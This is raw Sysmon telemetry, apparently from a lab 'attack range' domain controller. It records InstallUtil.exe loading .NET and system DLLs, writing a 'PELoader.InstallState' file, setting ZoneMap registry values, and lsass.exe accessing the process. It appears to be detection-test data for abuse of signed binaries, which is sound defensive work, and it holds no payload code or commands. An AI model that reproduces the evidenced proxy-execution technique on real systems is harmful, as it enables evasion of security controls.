734700x800000000000000057678956Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:23:55.745{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\474c5d5d840d0a8b1974061ff11f02c2\mscorlib.ni.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft Common Language Runtime Class LibraryMicrosoft® .NET FrameworkMicrosoft Corporationmscorlib.dllMD5=9955B914F307F0142D003E93A3A500BE,SHA256=1247284354586C375597AD8046AAC7F983BAAC74B545B674FB12DB4BAC5C6C01trueMicrosoft CorporationValid 534500x800000000000000057679062Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:00.870{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe 734700x800000000000000057679061Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:00.839{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Servd1dec626#\367b724a8a8d7a8816e8029637e9af91\System.ServiceModel.Internals.ni.dll4.8.4261.0 built by: NET48REL1LAST_BSystem.ServiceModel.Internals.dllMicrosoft® .NET FrameworkMicrosoft CorporationSystem.ServiceModel.Internals.dllMD5=D9D712B2F98C74C18C71B40FBFF12C72,SHA256=C1CB9C1223FFBBFA879B7972A34AD437C308829152CFF855802A6350C75B46A7false-Unavailable 734700x800000000000000057679060Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:00.839{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\SMDiagnostics\32788288a07982cb10ab4196907ef578\SMDiagnostics.ni.dll4.8.4261.0 built by: NET48REL1LAST_BSMDiagnostics.dllMicrosoft® .NET FrameworkMicrosoft CorporationSMDiagnostics.dllMD5=6520C012D5164F22C0A4F96E82F7979A,SHA256=BD1F07E923DBA63862A75A4D312268EFF3391C155C1103B20964DF8F7E21D5C1false-Unavailable 11241100x800000000000000057679059Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:00.839{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Users\Administrator\Desktop\PELoader.InstallState2021-11-12 19:24:00.839 734700x800000000000000057679058Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:00.839{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Runteb92aa12#\8a6f1fd5072bb947ca74e50ce391a3d3\System.Runtime.Serialization.ni.dll4.8.4261.0 built by: NET48REL1LAST_BSystem.Runtime.Serialization.dllMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Runtime.Serialization.dllMD5=D2D5D6F2005BB57034DBE003EE9D14A0,SHA256=53E2A4CB20464A9CDCE924F9513882F3DA575DBE10B68C9437EA37C074AEA798false-Unavailable 734700x800000000000000057679057Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:00.839{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x800000000000000057679056Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:00.839{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862trueMicrosoft WindowsValid 734700x800000000000000057679055Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:00.824{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 734700x800000000000000057679054Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:00.824{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000057679053Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:00.824{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=77BF2979C1A08EBA43C24FE0B7E547BE,SHA256=071E00374806E043A2E78E88C7FDDCE8F5983DE665DF41F3B3210660BF2EF704trueMicrosoft WindowsValid 734700x800000000000000057679052Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:00.824{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\shell32.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=837B8644B9CE47EC28152E7D764886E0,SHA256=C5BA64473FB38E6B4592EAFA642AF82715CBC676190985D8D8D4150CE840044FtrueMicrosoft WindowsValid 734700x800000000000000057679051Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:00.824{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\e1c9eb2e855d26a67dbf39e6236430de\System.Xml.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Xml.dllMD5=695EB4BE24FC9DB279F2427D31AD35D4,SHA256=014EDA5BD7025A6F01BEA1F6E05663FE4BCE64FA95B7378EBF9C827991B32E64false-Unavailable 734700x800000000000000057679050Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:00.824{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\5b778442ed2d60a5de14f752a124bf1a\System.Configuration.ni.dll4.8.4190.0 built by: NET48REL1LAST_BSystem.Configuration.dllMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Configuration.dllMD5=9EAA59368783AFE4107F28B6ED8AB1E6,SHA256=BBAC50983BA9B2EDA9CBA8FD0F1DCABF71D24D736A973BA164AF6917A3FC2E7Ffalse-Unavailable 734700x800000000000000057679049Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:00.824{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\625a7ccd665c33cee4988e3cd136b902\System.Core.ni.dll4.8.4395.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Core.dllMD5=27741782AAECFE54A201896D93BA1C9A,SHA256=7389517EE682897300DE398245D2C3EE37E5060CF6320138430A8AA86E6E737Bfalse-Unavailable 734700x800000000000000057679048Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:00.824{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x800000000000000057679047Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:00.824{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValid 734700x800000000000000057679046Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:00.824{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=0BC84513575743DA177F3DFE18D35CA7,SHA256=C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899trueMicrosoft WindowsValid 734700x800000000000000057679045Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:00.824{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=C55F634054E45C0DEE47C254AE009928,SHA256=76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575trueMicrosoft WindowsValid 734700x800000000000000057679044Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:00.824{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\windows.storage.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=1D7997E3AFC26B85024D33F835E18056,SHA256=B2376967E156D4971FB66059F6367030AF937943D2EBF80AF856E643B6E95BBFtrueMicrosoft WindowsValid 13241300x800000000000000057679043Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 19:24:00.824{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetectDWORD (0x00000000) 13241300x800000000000000057679042Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 19:24:00.824{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranetDWORD (0x00000000) 13241300x800000000000000057679041Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 19:24:00.808{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetectDWORD (0x00000000) 13241300x800000000000000057679040Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 19:24:00.808{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranetDWORD (0x00000000) 10341000x800000000000000057679039Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:00.808{8B6011A9-886B-6164-0B00-00000000F101}6488568C:\Windows\system32\lsass.exe{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057679038Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:00.808{8B6011A9-886B-6164-0B00-00000000F101}6488568C:\Windows\system32\lsass.exe{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057679037Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:00.808{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\sspicli.dll10.0.14393.2580 (rs1_release_inmarket.181009-1745)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=5061339CE61C0B32DB8F51A95E3B2422,SHA256=60558CA374334D4C6BBAD475921538C14A9FF3422893348A0503C1F33015FD25trueMicrosoft WindowsValid 12241200x800000000000000057679036Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 19:24:00.808{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap 734700x800000000000000057679035Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:00.808{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x800000000000000057679034Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:00.808{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 734700x800000000000000057679033Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:00.808{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\iertutil.dll11.00.14393.4467 (rs1_release.210604-1844)Run time utility for Internet ExplorerInternet ExplorerMicrosoft CorporationIeRtUtil.dllMD5=1D608361848C3A3AC56488995E8D0BB1,SHA256=D95DE5DBAD08E22CB0CFB9322220E752F16124C15867F7748E4D64795E400EBFtrueMicrosoft WindowsValid 734700x800000000000000057679032Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:00.808{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=D287E1BC5A148E2BCB482DBD0E925738,SHA256=1C2428AD170165DD8DE960C835D9AAB5B268300A676FE935B177ED5D2607430DtrueMicrosoft WindowsValid 734700x800000000000000057679031Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:00.808{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\urlmon.dll11.00.14393.4530 (rs1_release.210705-0736)OLE32 Extensions for Win32Internet ExplorerMicrosoft CorporationUrlMon.dllMD5=B63DBDFEC215CF37259DC4A88ADBD0E7,SHA256=67B02F3DE0AF36E76C2D259CE7833EDA4FE33D935538E8A4C1E7E82130870FC1trueMicrosoft WindowsValid 734700x800000000000000057679030Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:00.808{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\bcacaaa795f281ac827a1af051d3a051\System.Configuration.Install.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Configuration.Install.dllMD5=DF0A266E1C073131336B9597E2543820,SHA256=F1079A19E1C6E19EB1A2BA701A3919A0A0474EDFA579D8F3EC05965ECDF5F6FDfalse-Unavailable 734700x800000000000000057679029Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:00.808{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll4.8.4380.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.dllMD5=C928B5301D291782935A1342A01F6125,SHA256=945ACD65BDCE2291C3C2D15FD910F6E331570D516D386C53FDFB5EC38BE69125false-Unavailable 734700x800000000000000057679028Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:00.792{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\clrjit.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Just-In-Time CompilerMicrosoft® .NET FrameworkMicrosoft Corporationclrjit.dllMD5=0745D9F1BAC58E47CC87656768304313,SHA256=BBA1936354A9EF269B283FE706A74B73BE39CAF4DD57AB0D1CD06A1C75E260A2trueMicrosoft CorporationValid 734700x800000000000000057679027Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:00.792{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x800000000000000057679026Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:00.792{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\474c5d5d840d0a8b1974061ff11f02c2\mscorlib.ni.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft Common Language Runtime Class LibraryMicrosoft® .NET FrameworkMicrosoft Corporationmscorlib.dllMD5=9955B914F307F0142D003E93A3A500BE,SHA256=1247284354586C375597AD8046AAC7F983BAAC74B545B674FB12DB4BAC5C6C01trueMicrosoft CorporationValid 734700x800000000000000057679025Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:00.777{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\vcruntime140_clr0400.dll14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140_clr0400.dllMD5=63936588122BDEE9624D02CE3F8F54EA,SHA256=21F7E6165CE8DD92DB8CDF48CEE83DE64B2B0807B7B499CF87678B70C6F8C32FtrueMicrosoft CorporationValid 734700x800000000000000057679024Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:00.777{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ucrtbase_clr0400.dll14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationucrtbase_clr0400.dllMD5=F8F171BE1820544E15B555847005355C,SHA256=CDDF9A2BF085AE59BA464B3BA6394AACFC342DA5F17D77FD5306054C8AABF153trueMicrosoft CorporationValid 13241300x800000000000000057679023Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 19:24:00.777{8B6011A9-884A-6164-0100-00000000F101}4SystemHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\CIT\Module\Microsoft.NET/Framework64/v4.0.30319/clr.dll\\Device\HarddiskVolume1\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeQWORD (0x01d7d7fa-0xd8ad9dc3) 734700x800000000000000057679021Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:00.777{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Common Language Runtime - WorkStationMicrosoft® .NET FrameworkMicrosoft Corporationclr.dllMD5=1AF77AF533C702978D4C91C31DB1CCE5,SHA256=39AB2B2B034E3210D866FCF8649EB84C28E3DAB7CB7FA7C986346C6A9ED22D0AtrueMicrosoft CorporationValid 734700x800000000000000057679020Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:00.777{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=CFDB018AC09F879CAAE7A66CA7880D57,SHA256=6AB95FD0D142CFFC3B9455AF51F003E1CD75B7F4323820390B975F9E1C8A47A5trueMicrosoft WindowsValid 734700x800000000000000057679019Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:00.777{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x800000000000000057679018Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:00.777{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValid 734700x800000000000000057679017Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:00.777{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057679016Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:00.777{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000057679015Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:00.777{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 